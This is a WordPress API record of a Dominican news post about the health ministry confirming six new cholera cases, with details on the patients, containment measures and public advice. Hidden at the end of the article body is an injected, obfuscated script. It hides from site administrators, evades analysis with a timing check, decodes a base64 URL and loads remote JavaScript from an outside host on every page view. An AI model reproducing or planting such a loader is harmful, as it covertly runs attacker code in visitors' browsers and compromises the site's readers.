{"id":13560,"date":"2023-01-23T13:02:40","date_gmt":"2023-01-23T17:02:40","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13560"},"modified":"2023-01-23T13:02:40","modified_gmt":"2023-01-23T17:02:40","slug":"mispas-notifica-a-la-poblacion-seis-nuevos-casos-de-colera","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13560","title":{"rendered":"MISPAS notifica a la poblaci\u00f3n seis nuevos casos de c\u00f3lera"},"content":{"rendered":"<p>Santo Domingo.- El Ministerio de Salud P\u00fablica y Asistencia Social\u00a0<strong>(MISPAS)<\/strong>\u00a0a trav\u00e9s del\u00a0<strong>Viceministerio de Salud Colectiva y\u00a0 su Direcci\u00f3n General de Epidemiolog\u00eda (DIGEPI)<\/strong>\u00a0notifica a la poblaci\u00f3n que se han confirmado, mediante los an\u00e1lisis de rigor,\u00a0<strong>seis nuevos casos de c\u00f3lera<\/strong>. Hay dos casos correspondientes a dominicanos, un masculino de 56 a\u00f1os y una femenina de 37, residentes en Villa Liberaci\u00f3n y los Solares del Almirante en Santo Domingo Este.<\/p>\n<p>En tanto que los\u00a0<strong>cuatro casos restantes son importados<\/strong>\u00a0y corresponden a pacientes de nacionalidad haitiana, dos masculinos de 47 y 31 a\u00f1os y dos femeninas de 72 y 9 a\u00f1os.<\/p>\n<p>Los pacientes fueron ingresados entre el 18 y el 20 del presente mes de enero, luego de presentar diarrea acuosa y blanquecina acompa\u00f1ada de v\u00f3mitos.\u00a0\u00a0<strong>Recibieron atenci\u00f3n en un centro de salud, donde fueron hidratados y estabilizados,<\/strong>\u00a0para proceder de inmediato a tomar las muestras coprol\u00f3gicas, cuyo resultado dio positivo a c\u00f3lera el 22 de enero.<\/p>\n<p>El reporte m\u00e9dico certifica que los pacientes llevan m\u00e1s de 24 horas sin evacuaciones; se mantienen estables, y de buen \u00e1nimo, mientras\u00a0<strong>permanecen ingresados para fines de observaci\u00f3n<\/strong>, con posible de alta en las pr\u00f3ximas horas.<\/p>\n<p>De igual manera, las\u00a0<strong>Direcciones de \u00c1reas de Salud I y VI,\u00a0 junto al Viceministerio de Salud Colectiva, la DIGEPI y la Direcci\u00f3n de Gesti\u00f3n de Riesgos del Ministerio<\/strong>, mantienen el\u00a0<strong>cerco epidemiol\u00f3gico<\/strong>\u00a0con los familiares cercanos y la\u00a0<strong>intervenci\u00f3n permanente en las zonas a observar<\/strong>, para detectar, prevenir e investigar cualquier caso sospechoso de la enfermedad. Adem\u00e1s, de cuenta con la instalaci\u00f3n de un\u00a0<strong>consultorio m\u00e9dico m\u00f3vil\u00a0<\/strong>para tratar cualquier emergencia presentada en los sectores identificados.<\/p>\n<p>De acuerdo con el reporte epidemiol\u00f3gico,\u00a0<strong>hasta el momento no hay familiares de pacientes con s\u00edntomas sospechosos de la enfermedad<\/strong>. Salud P\u00fablica ratifica que contin\u00faa<strong>\u00a0la intervenci\u00f3n en el sector la Zurza<\/strong>, donde hace m\u00e1s de dos semanas no se reportan nuevos casos, y\u00a0<strong>mantiene la atenci\u00f3n en nacionales haitianos que regresen al pa\u00eds procedentes de Puerto Pr\u00edncipe<\/strong>, ante la posibilidad de que puedan ingresar contagiados de la enfermedad.<\/p>\n<p>Igualmente, permanece la\u00a0<strong>exhortaci\u00f3n a la poblaci\u00f3n en cuanto a cuidarse\u00a0<\/strong>y en caso de presentar cuadros de evacuaciones diarreicas acuosas varias veces en el d\u00eda, hidratarse bien y\u00a0<strong>acudir inmediatamente al centro de salud m\u00e1s cercano.<\/strong><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.- El Ministerio de Salud P\u00fablica y Asistencia Social\u00a0(MISPAS)\u00a0a trav\u00e9s del\u00a0Viceministerio de Salud Colectiva y\u00a0 su Direcci\u00f3n General de Epidemiolog\u00eda (DIGEPI)\u00a0notifica a la poblaci\u00f3n que se han confirmado, mediante los an\u00e1lisis de rigor,\u00a0seis nuevos casos de c\u00f3lera. Hay dos casos correspondientes a dominicanos, un masculino de 56 a\u00f1os y una femenina de 37, residentes [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13562,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13560","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13560","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13560"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13560\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13562"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13560"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}